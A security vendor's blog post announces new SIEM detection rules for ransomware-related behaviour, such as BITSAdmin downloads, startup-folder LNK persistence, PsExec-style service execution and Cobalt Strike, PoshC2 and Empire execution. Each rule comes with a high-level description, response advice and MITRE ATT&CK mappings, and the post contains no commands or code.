Blumira’s incident detection engineers continue to crank out the security detection rules, automatically rolled into our platform to help you detect and respond to the latest attacks.
This week, they’ve added findings that can help you identify indicators of a potential ransomware attack in progress so you can act quickly to remediate. With these new detections, Blumira’s platform alerts you to malicious behavior, including:
Blumira’s platform can provide near real-time detection and high-confidence alerts of attacker activity in your environment, in addition to playbooks to guide you through faster remediation. We surface contextual information to help with investigations and forensics, and our security team is available if you have further questions.
As a result, you can automate your security operations to prevent and detect a ransomware data breach.
Written by Incident Detection Engineer Brian Laskowski:
Requirements: To get the security detections below, you will need to install and configure Microsoft System Monitor (Sysmon). See how in How to Enable Sysmon.
Detection: Bitsadmin Download
Bitsadmin is software built into the Windows operating system, used for downloading files. Threat actors can take advantage of the software to download their own malicious payloads. Blumira recommends organizations review the software that was downloaded and confirm that it is approved software in your environment.
Most recently, this attack was called out in a FireEye report on ransomware actors. After initial access, an attacker deployed additional malware, using different techniques to establish a foothold. They installed a backdoor on the target host, and used BITS Jobs and remote PowerShell downloads to download other tools.
MITRE: T1197, Tactics: Defense Evasion, Persistence
Detection: Startup Folder LNK File
Startup folders are commonly used to auto run programs on boot. Threat actors can take advantage of this behavior to achieve persistence. A common method to do this is to place a crafted LNK file that, when run, executes a program that the threat actor wants to start on boot. Blumira recommends collecting and reviewing what the LNK file points to execute on the system.
MITRE: T1547.001, Tactics: Persistence, Privilege Escalation
Detection: System Services: Service Execution with Lateral Movement Tools
Many penetration testing tools have a feature in them that takes advantage of the features of PSEXEC for sending files over SMB and then executing them via a service. If you do find the user that initiated the service creation, they may potentially be compromised, and Blumira recommends locating all devices the user is logged in on and consider isolating them while performing further investigation.
MITRE: T1569.002, Tactic: Execution
Detection: Default Execution Flags for Cobalt Strike
Cobalt Strike is a commercially available post-exploitation framework. While intended for use by authorized penetration testers, cracked versions of the software are abundant and its ease of use makes it a popular choice among cyber criminals. This tool has been seen used by red teams, APT actors, and ransomware threat actors.
MITRE: T1059.001, Tactic: Execution
Detection: Default Execution Flags for PoshC2
Posh C2 is an open source post-exploitation framework. This means it is freely available to download and is used by a threat actor usually when they are ready to begin moving laterally and escalate to exploiting an Active Directory infrastructure. This tool has been seen used by red teams, APT actors, and ransomware threat actors.
MITRE: T1059.001, Tactic: Execution
Detection: Default Execution Flags PowerShell Empire
PowerShell Empire is an open source post-exploitation framework. This means it is freely available to download and is used by a threat actor usually when they are ready to begin moving laterally and escalate to exploiting an Active Directory infrastructure. This tool has been seen used by red teams, APT actors, and ransomware threat actors.
MITRE: T1059.001, Tactic: Execution
Written by Sr. Incident Detection Engineer Bill Reyor:
Detection: Watch Folder on Linux Host Accessed
This alert is triggered when a customer-configured watch folder on a linux host is modified or interacted with. This type of potential attacker behavior is commonly used for data exfiltration. Blumira recommends identifying if the alert activity was authorized and expected, and if it was not, then to review the alert for the source user and consider initiating incident response activities around this potentially compromised user account.
Requirements: To get this security detection, you must configure log forwarding by integrating Linux auditd with Blumira. See how in our Linux auditd documentation.
MITRE: TA0010, Tactic: Exfiltration
See our other detections added recently this month and last:
Learn more by watching a demo or requesting a live demo. Or, sign up for a free trial and deploy Blumira’s cloud SIEM in hours.